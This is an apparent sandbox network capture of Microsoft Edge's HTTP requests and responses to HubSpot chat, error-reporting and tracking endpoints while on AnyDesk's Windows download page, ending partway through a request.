report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBeDnG5hVFprMMxJnnhuXXHh3OYLHRA2kFA8Ct1HH5sGwHPcT4BDTn0QLUMr7eQ1Z8bAxp%2B3uWwb8MMtOEYH5F5jbhpwu%2FzSgmGhjM9su5HsgWnam%2FqlSSMg%2FSEbYHezdg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=rUkWAf3sRTXv9qpw3N.4dAbfcYXTCRCwfihNEwcGl.g-1728144496180-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
x-hubspot-messages-uri: https://anydesk.com/en/downloads/windows
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: application/json;charset=utf-8
content-length: 1489
cf-ray: 8cdeab5e08f10bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
cache-control: no-cache, no-store, no-transform, must-revalidate, max-age=0
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: c1a01893-c104-44bc-ac83-4cf452fd1646
set-cookie: __cf_bm=P6_OVEdnSoSoJFAxyg2SZvn2kFyB29xtY_p9pNFf_7Y-1728144496-1.0.1.1-gyykDQFUtSJORIq9aTVJvbiX1Xy0JWF3XhlndynNoXjD47dlYQEtaaQza8cKdhhPoFFlBVL2kVp4zdQB7MXrFw; path=/; expires=Sat, 05-Oct-24 16:38:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlpCZk%2Fp%2Bqubw9%2BWtaCm%2F796Cr1WUcqqJEgWht046NenBvS1%2FYq6dOsjmI2NI4LhQu3eCnf4k%2B61YclTlI1VbdCT6jxXw0Dlj86QCnNhc97TMJ9y5w0EHx2GwVTih%2B2BMg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=nqcKA5VxTvYZ23HfwimrqUJzK87O97dCE8E.22usK3k-1728144496606-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: text/html; charset=utf-8
cf-ray: 8cdeab60ad240bad-AMS
cf-cache-status: DYNAMIC
age: 2273
cache-control: max-age=600
content-encoding: gzip
etag: W/"92cfcc4f73d45a74e3aa5782ce9dc842"
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
via: 1.1 36b04143ac1626bb30bb225fb2cccb1e.cloudfront.net (CloudFront)
access-control-allow-credentials: false
cache-tag: staticjsapp-conversations-visitor-ui-web-prod,staticjsapp-prod
content-security-policy-report-only: script-src 'self' www.hubspot.com *.hsappstatic.net *.hs-analytics.net *.hs-banner.com *.hsforms.net *.hsleadflows.net *.hs-scripts.com *.hubspotfeedback.com *.usemessages.com js.hubspot.com *.hsadspixel.net *.hscollectedforms.net js-agent.newrelic.com bam.nr-data.net bam-cell.nr-data.net *.google-analytics.com www.googletagmanager.com data: 'unsafe-inline' 'unsafe-eval' blob: connect.facebook.net www.gstatic.cn www.gstatic.com www.google.com www.recaptcha.net *.fullstory.com fullstory.com apis.google.com snap.licdn.com; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-visitor-ui/static-1.20626/html/index.html&cfRay=8cdeab60ad240bad&reqUrl=https%3A%2F%2Fapp.hubspot.com%2Fconversations-visitor%2F7940397%2Fthreads%2Futk%2F19d7532a5e5749fbbfb32b46383ca6b0%3Fuuid%3Dea9395a1d4604a038597a54463ee6361%26mobile%3Dfalse%26mobileSafari%3Dfalse%26hideWelcomeMessage%3Dfalse%26hstc%3D261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1%26domain%3Danydesk.com%26inApp53%3Dfalse%26messagesUtk%3D19d7532a5e5749fbbfb32b46383ca6b0%26url%3Dhttps%253A%252F%252Fanydesk.com%252Fen%252Fdownloads%252Fwindows%26inline%3Dfalse%26isFullscreen%3Dfalse%26globalCookieOptOut%3D%26isFirstVisitorSession%3Dtrue%26isAttachmentDisabled%3Dfalse%26isInitialInputFocusDisabled%3Dfalse%26enableWidgetCookieBanner%3Dfalse%26isInCMS%3Dfalse%26hideScrollToButton%3Dtrue%26isIOSMobile%3Dfalse%26hubspotUtk%3Da5b3d1933284be27e3a7527fad5a6a3f&referrer=https%3A%2F%2Fanydesk.com%2F&cfenv=prod&pdt=2024-10-05&csp=ro
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://send.hsbrowserreports.com/csp/reports"}]}
reporting-endpoints: default="https://send.hsbrowserreports.com/csp/reports?cfRay=8cdeab60ad240bad&resource=conversations-visitor-ui/static-1.20626/html/index.html"
x-amz-cf-id: gsEYcsKnJXY2OK9T3oUT9OePdk9D4SxFUXY2DCt2P3DXzPaVnL_c-w==
x-amz-cf-pop: IAD12-P3
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-version-id: hVkVcK8l8m_IHBKUGh9hahU3mPpZRmCl
x-cache: Hit from cloudfront
x-content-type-options: no-sniff
x-envoy-upstream-service-time: 4
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-cvrbm
x-evy-trace-virtual-host: all
x-hs-cache-status: MISS
x-hs-target-asset: conversations-visitor-ui/static-1.20626/html/index.html
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 58f0db54-c9b1-448f-8d77-26a9d9bce09e
x-request-id: 58f0db54-c9b1-448f-8d77-26a9d9bce09e
set-cookie: __cf_bm=LV9182SCBPGTlzMw8SgVbS1RU0.oTi.MCr64DF.cFFI-1728144496-1.0.1.1-m5fPAPoVxIni.1GAMrweQxZRe2.AXF3nQbmm_iMj5jflV.lBVK05_Ig9lPFhsPaYy5zPNrH0a.tit4Mbsl6F5g; path=/; expires=Sat, 05-Oct-24 16:38:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
set-cookie: _cfuvid=jK_ughK04VLkPFSLQvsq8SVtltvpBiUEhP0KMAIJ8nY-1728144496932-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2372
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 13
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: cf2ede85-a42d-4561-9a25-1828618ad72f
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-4l5f8
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: cf2ede85-a42d-4561-9a25-1828618ad72f
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=Qma0krq3U9N3fzWIiEKIocAyfrDnD8ne6RhqHibp5Xs-1728144497-1.0.1.1-Gp7FKNW6toI4VaSMcl3WxB0dZ9AlfSkBr_JtoDCWhc9Ct4vt4oCcYfk2zYv6GjwivabzdYKiJnuICYXxA6..LQ; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNfQybA532xMHiWiwP4lZjN7Li9fbWlDW3bRihwILkSuDStPQug90zIRw3BXpPL2jG3W%2F0PIrzFCL8iOwawvoVoKJ9Yj38AluDBIiS2OSUBfcGisb4bZ17ltO1tKTVd84hJjq9N7b9Y%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=atO8VCGFtyrJcbgvJFGqcyeyZmIdczc4.Ob9wfGRDgI-1728144497343-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab6398e00bad-AMS
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2067
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 16
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: a5fcc050-7c8a-49b8-9594-962ba4cf2486
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-j6kns
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: a5fcc050-7c8a-49b8-9594-962ba4cf2486
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=Nd78k3jgGyIKFFfc4KauDYWBbb_cCYT1iQ4lS2gsof4-1728144497-1.0.1.1-D_KFdnPOOty3hMm1CY6HdnYENE_7Wx.FR5Z.A6GtHL3VhEYzYOKhhrBmANNst55_6Wis386ziEQ7rF8dH.KQCQ; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XYH5zG1E5sbyaQvn2QRVgRiA99QlNn2ZebwWV6F8zFxCmxL%2BT1BIrRggBY8Ba0GKei0p9HQXmWczd6EXBH50l%2FAefaxZWHSmPbiwWwJV5ZmpX4khn%2FU3e4hXzR688ejhTlODw8JMaHQ%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=x4.6SOGFS_ESlM.uKxOy4BXInBR3gIZBLkJVqnZNar4-1728144497365-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab63a8f40bad-AMS
POST

https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 407
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:17 GMT
cf-ray: 8cdeab63b9070bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=3c50a4f3-db00-4fe9-811e-0217059db210
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 3c50a4f3-db00-4fe9-811e-0217059db210
set-cookie: __cf_bm=LqvBieLA_eqQYg4wEEKq5OXIJQv_IkUrJ4I93uSJg9I-1728144497-1.0.1.1-8l7vkd_xAKOo4JK8RhLnpzhH5jW5SKJo3uTKawMvLDYGAQmmQZFHtgMm83G0G_mU.jCB5WIzRgrlQt2S08bmbg; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZkhhzRsOc2jtw8IPw%2F7658V8YdDXrU8Wq4Yz%2FAS66ILhs%2BEFnZdDIYieKGuAcyMBYmOHXwx3Pf9rLujQTpDWndFx%2FZPnIg%2FVn51gXyGekZbbJ4AKZqJow6IiW22tMY6wVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=sqUqQ89_tJjr39BZznZmccoTEdWz3vYgDWaa2W8QfNc-1728144497367-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=19d7532a5e5749fbbfb32b46383ca6b0&sessionId=AMOaWbJ1BLIlIgkW-g2hYZQdWjb8QTD0Lg6pw6AD_d3aISYCt4YuwA1HKKBLv7YTFTi5vx56oxJNAQG5ErXzHNhBJcGKqmr6amnYTAl8cNyYXB3THJci8UxlL5JftpOxQu0eYon93LuaZuVitgzriB1piJmLqlCf4kQbjpeP_aHudBvJjPgCM70&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=19d7532a5e5749fbbfb32b46383ca6b0&sessionId=AMOaWbJ1BLIlIgkW-g2hYZQdWjb8QTD0Lg6pw6AD_d3aISYCt4YuwA1HKKBLv7YTFTi5vx56oxJNAQG5ErXzHNhBJcGKqmr6amnYTAl8cNyYXB3THJci8UxlL5JftpOxQu0eYon93LuaZuVitgzriB1piJmLqlCf4kQbjpeP_aHudBvJjPgCM70&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json, text/javascript, */*; q=0.01
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: application/json;charset=utf-8
content-length: 529
cf-ray: 8cdeab63e9320bad-AMS
cf-cache-status: DYNAMIC
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
server-timing: hcid;desc=9fcc3162-e01a-4cb9-98e1-3d9f384899ab
x-content-type-options: nosniff
x-hubspot-correlation-id: 9fcc3162-e01a-4cb9-98e1-3d9f384899ab
set-cookie: __cf_bm=6uzPj4lSNFrYmKxWcBG3_LUhTKcTJpC9RPdu8ze6jME-1728144497-1.0.1.1-Qq5YA8qoGOhKTixnLsl0tEfBW2EFj8_LLDZVYZznZBFkdhHbaqMFW_El0bJqrll13DIXYMj6oQmidjYCZ..Y1w; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t50YZttCMMQU%2BBET63afrHElWVc7VvjEJ2gkK7UEBAkPnH%2BFukXbbqeIcEhz%2FBVaNZKVeXxNzJsZRNTeXrGamxGHR7jz8GP5LaycTP4W4rUubyDbmia1BZBp5dtU1HL%2BhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=zT2QY.QeQeQbDQxM_aGMqDxNoDzag0WlK8rNMWcc.2I-1728144497412-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144496575&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.2.1728144483689&cc=15

msedge.exe

Remote address:

104.16.117.116:443

Request

